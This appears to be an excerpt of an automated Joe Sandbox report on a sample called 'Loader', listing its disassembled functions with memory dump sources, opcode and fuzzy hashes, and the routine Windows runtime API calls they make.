                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2405b6ca504f8740c24341dab4b2f58b887bf50b90a24aaf26cf3cc89a8d6cf8
                                                                                      • Instruction ID: 75ef817e0b2a21fd7a0420f6bfe2aa7a15a283e327b2f082b7dccc3af5e4f701
                                                                                      • Opcode Fuzzy Hash: 2405b6ca504f8740c24341dab4b2f58b887bf50b90a24aaf26cf3cc89a8d6cf8
                                                                                      • Instruction Fuzzy Hash: 2421A13162020AAF9B20AF65CC809EB77ADEF413E47144525FB1997241EB30ECF0CB60
                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 002C9466
                                                                                        • Part of subcall function 002C23A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,002C3B75,?,00000000,-00000008), ref: 002C2402
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002C949E
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002C94BE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 158306478-0
                                                                                      • Opcode ID: daff82f0ab6fa1ec3caeb648ea4dcf6e517636e8a95e933823855fbfe499f96c
                                                                                      • Instruction ID: 4e5e0c29dc291a7d106a36eb309d41fa5b9de7281c7812b00ca39088138b047b
                                                                                      • Opcode Fuzzy Hash: daff82f0ab6fa1ec3caeb648ea4dcf6e517636e8a95e933823855fbfe499f96c
                                                                                      • Instruction Fuzzy Hash: 001104B1521547BF672567B66CCDEAF7A9CCE893A4710023CFC0591100FE708DA285B1
                                                                                      APIs
                                                                                      • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,002D149F,00000000,00000001,?,?,?,002CA630,?,00000000,00000000), ref: 002D27C7
                                                                                      • GetLastError.KERNEL32(?,002D149F,00000000,00000001,?,?,?,002CA630,?,00000000,00000000,?,?,?,002C9F76,?), ref: 002D27D3
                                                                                        • Part of subcall function 002D2830: CloseHandle.KERNEL32(FFFFFFFE,002D27E3,?,002D149F,00000000,00000001,?,?,?,002CA630,?,00000000,00000000,?,?), ref: 002D2840
                                                                                      • ___initconout.LIBCMT ref: 002D27E3
                                                                                        • Part of subcall function 002D2805: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,002D27A1,002D148C,?,?,002CA630,?,00000000,00000000,?), ref: 002D2818
                                                                                      • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,002D149F,00000000,00000001,?,?,?,002CA630,?,00000000,00000000,?), ref: 002D27F8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                      • String ID:
                                                                                      • API String ID: 2744216297-0
                                                                                      • Opcode ID: 220002b8c6b0918ce66c286df7d3266ac0587abd035bf33c2b34287aa1d5af32
                                                                                      • Instruction ID: 9c933d849e1538cbb8f04507d0f2ef823ae739f1fc3cba8b8ffafd7ab8e41459
                                                                                      • Opcode Fuzzy Hash: 220002b8c6b0918ce66c286df7d3266ac0587abd035bf33c2b34287aa1d5af32
                                                                                      • Instruction Fuzzy Hash: 70F01536150199FBCF226F91EC4C98E3F66FB183A1B154221FA18C9220D6328D70EBA0
                                                                                      APIs
                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 002B6EE7
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 002B6EF6
                                                                                      • GetCurrentProcessId.KERNEL32 ref: 002B6EFF
                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 002B6F0C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                      • String ID:
                                                                                      • API String ID: 2933794660-0
                                                                                      • Opcode ID: ef0ccfef6ce14c9a0c4e002279b8ce6e2cce4514f494b633728a66cc2905e27f
                                                                                      • Instruction ID: 40ca304e30ad309c9742bcbc355efeefeb58ed7ab67cbba4bcf8c53a5351249d
                                                                                      • Opcode Fuzzy Hash: ef0ccfef6ce14c9a0c4e002279b8ce6e2cce4514f494b633728a66cc2905e27f
                                                                                      • Instruction Fuzzy Hash: 8AF0B234C4020CEBDB04DBB4DA8898EBBF4FF1D200B9145A5A412EB110E730AB54CB50
                                                                                      APIs
                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 002CBBFD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorHandling__start
                                                                                      • String ID: pow
                                                                                      • API String ID: 3213639722-2276729525
                                                                                      • Opcode ID: 8f548199f9e31df2970e302b340749786547f07dae682dae57ef1ed8a1c9fa62
                                                                                      • Instruction ID: 70287949da56f37cfe1d3f00dcdea36997205d239029d071dab67c53e7522b16
                                                                                      • Opcode Fuzzy Hash: 8f548199f9e31df2970e302b340749786547f07dae682dae57ef1ed8a1c9fa62
                                                                                      • Instruction Fuzzy Hash: 71517A609391039AC7127F14DE52FBA2BA09B40B51F344F5FE48E422A8EF318DB59A46
                                                                                      APIs
                                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,002D2C5F), ref: 002D1B2F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: DecodePointer
                                                                                      • String ID: 0*+$<-
                                                                                      • API String ID: 3527080286-3245519328
                                                                                      • Opcode ID: e1027a31e5a6d38a59ba540fe9e923fed1527531add6a3262fc8b473710c1cf3
                                                                                      • Instruction ID: 0cba09a05c67dc51c59de6ed7a6b7158f1ee14c51443d358f1519621fa6f3037
                                                                                      • Opcode Fuzzy Hash: e1027a31e5a6d38a59ba540fe9e923fed1527531add6a3262fc8b473710c1cf3
                                                                                      • Instruction Fuzzy Hash: C5518B7197060AEBCF109FA8E88C1ADBBB0FF45348F150147D481AAB68D7B08D74CB51
                                                                                      APIs
                                                                                      • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,002C1C13,?,?,00000000,00000000,00000000,?), ref: 002C1D37
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: EncodePointer
                                                                                      • String ID: MOC$RCC
                                                                                      • API String ID: 2118026453-2084237596
                                                                                      • Opcode ID: a5f67071ef180219ce7f5aac63bd1686d12007c39bfad6fc2f55d0931e0b7498
                                                                                      • Instruction ID: b69b2901c2f94ea08c6e3af468a79d8287d1c756895b7a9e7d96ba522985dc5c
                                                                                      • Opcode Fuzzy Hash: a5f67071ef180219ce7f5aac63bd1686d12007c39bfad6fc2f55d0931e0b7498
                                                                                      • Instruction Fuzzy Hash: 8F41793291020AAFCF15DF94D882FEEBBB5BF49304F158299F905A7212D3359970DB50
                                                                                      APIs
                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00422F67
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentExpandStrings
                                                                                      • String ID: #|$~$
                                                                                      • API String ID: 237503144-1891908638
                                                                                      • Opcode ID: 272dfd1d6627198109df39eca2261d8ce41cdc1f1760eeebf8b73a28539f4b09
                                                                                      • Instruction ID: 7c60b196303697f66f5468225567e483a754b79d9a5cbcd5bc9b4e0355bbd561
                                                                                      • Opcode Fuzzy Hash: 272dfd1d6627198109df39eca2261d8ce41cdc1f1760eeebf8b73a28539f4b09
                                                                                      • Instruction Fuzzy Hash: 2F3131757483149FD308CF64D88074FBBA2EBCA704F09C92CE6D45B2D5C7B899068B96
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: MetricsSystem
                                                                                      • String ID:
                                                                                      • API String ID: 4116985748-3916222277
                                                                                      • Opcode ID: d624dc3d91f27f90759a8b9df2392553bbcc0d8bad6c510b9c239a91690eeb66
                                                                                      • Instruction ID: 95564d6794437dc0693950687fdf8a2eb14cbc1346cd3436bde2defe88fcd08e
                                                                                      • Opcode Fuzzy Hash: d624dc3d91f27f90759a8b9df2392553bbcc0d8bad6c510b9c239a91690eeb66
                                                                                      • Instruction Fuzzy Hash: 2F317EF49143148FDB00EF68D98565EBBF4BB89304F11852EE498DB364D774A988CF86
                                                                                      APIs
                                                                                      • __alloca_probe_16.LIBCMT ref: 002B39C9
                                                                                      • RaiseException.KERNEL32(?,?,?,?), ref: 002B39EE
                                                                                        • Part of subcall function 002B6FFC: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,?,?,?,002A303D), ref: 002B705D
                                                                                        • Part of subcall function 002BEB03: IsProcessorFeaturePresent.KERNEL32(00000017,002BA13B,?,?,?,?,00000000,?,?,002BE59E,00000000,00000000,00000000,00000000,00000000), ref: 002BEB1F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                      • String ID: csm
                                                                                      • API String ID: 1924019822-1018135373
                                                                                      • Opcode ID: 4d4c65cfe20c5e26d695b8cea7dcba8e6f22db46653ce4d8894ebd0bda71ca92
                                                                                      • Instruction ID: f7ed62072e44509fccccd8d64f288fe9a7e661abb09197d35cc3c1df4c9d7417
                                                                                      • Opcode Fuzzy Hash: 4d4c65cfe20c5e26d695b8cea7dcba8e6f22db46653ce4d8894ebd0bda71ca92
                                                                                      • Instruction Fuzzy Hash: 7421D431D10219DBCF34DF94D989AEEB7B8FF04790F150419E446AB250CBB0AE65CB81
                                                                                      APIs
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 002B3059
                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 002B30B5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                      • String ID: 0*+
                                                                                      • API String ID: 593203224-419236330
                                                                                      • Opcode ID: 9413490788b5b55dd82560917d491588468be407eab16e5b805ec6983fee62a8
                                                                                      • Instruction ID: c6149a648aa08b33c63042379b3697daf40866eaad171ec110321fef29e5d942
                                                                                      • Opcode Fuzzy Hash: 9413490788b5b55dd82560917d491588468be407eab16e5b805ec6983fee62a8
                                                                                      • Instruction Fuzzy Hash: D1014C35620616EFCB15EF18D885EA977B9EF84790B1400A9E8029B2A0DF70EE55CF50
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: Yarn
                                                                                      • String ID: l-
                                                                                      • API String ID: 1767336200-3460958610
                                                                                      • Opcode ID: 39bd92aec441b33882bc753c2f0ca4c5067d2de216fcfe5d07991df547dc7cf3
                                                                                      • Instruction ID: 985e4a7b4873720f867e52565dfd713b715f0f486a5b63f1f76cf6070afc82d6
                                                                                      • Opcode Fuzzy Hash: 39bd92aec441b33882bc753c2f0ca4c5067d2de216fcfe5d07991df547dc7cf3
                                                                                      • Instruction Fuzzy Hash: 48E065333287007BEB08A665EC52FFA33E8CB417E0F10002EFD1A8A6C1ED10BC244950
                                                                                      APIs
                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 002C3050
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountCriticalInitializeSectionSpin
                                                                                      • String ID: 0*+$InitializeCriticalSectionEx
                                                                                      • API String ID: 2593887523-1634505165
                                                                                      • Opcode ID: c828011721dc8a1b57f9e426e7dca8f10258fc34c3af8a30163c055e8f5e920a
                                                                                      • Instruction ID: 0b401f5cb04f99bc62e3ddfb6acfa66ce8560b6111520ef2a728bd821ec4c265
                                                                                      • Opcode Fuzzy Hash: c828011721dc8a1b57f9e426e7dca8f10258fc34c3af8a30163c055e8f5e920a
                                                                                      • Instruction Fuzzy Hash: 06E09232694219BBCF216F50DC0AE9E3F15EF41BA0B008122FD1919260D6714E30AB80
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: Alloc
                                                                                      • String ID: 0*+$FlsAlloc
                                                                                      • API String ID: 2773662609-776852136
                                                                                      • Opcode ID: 3363ca8052202516fb7d271980e6d7edd190f0f09fccd4510fe6bd1baa706b06
                                                                                      • Instruction ID: 1f57044240c19451a85a0d2327da5711ffa59f64ff3dbfbe5045b93620d1c258
                                                                                      • Opcode Fuzzy Hash: 3363ca8052202516fb7d271980e6d7edd190f0f09fccd4510fe6bd1baa706b06
                                                                                      • Instruction Fuzzy Hash: 9EE0C231AE0239A796117691AC0AEAE7D05DB81BA1F090132F9062A391AEB41D3056D6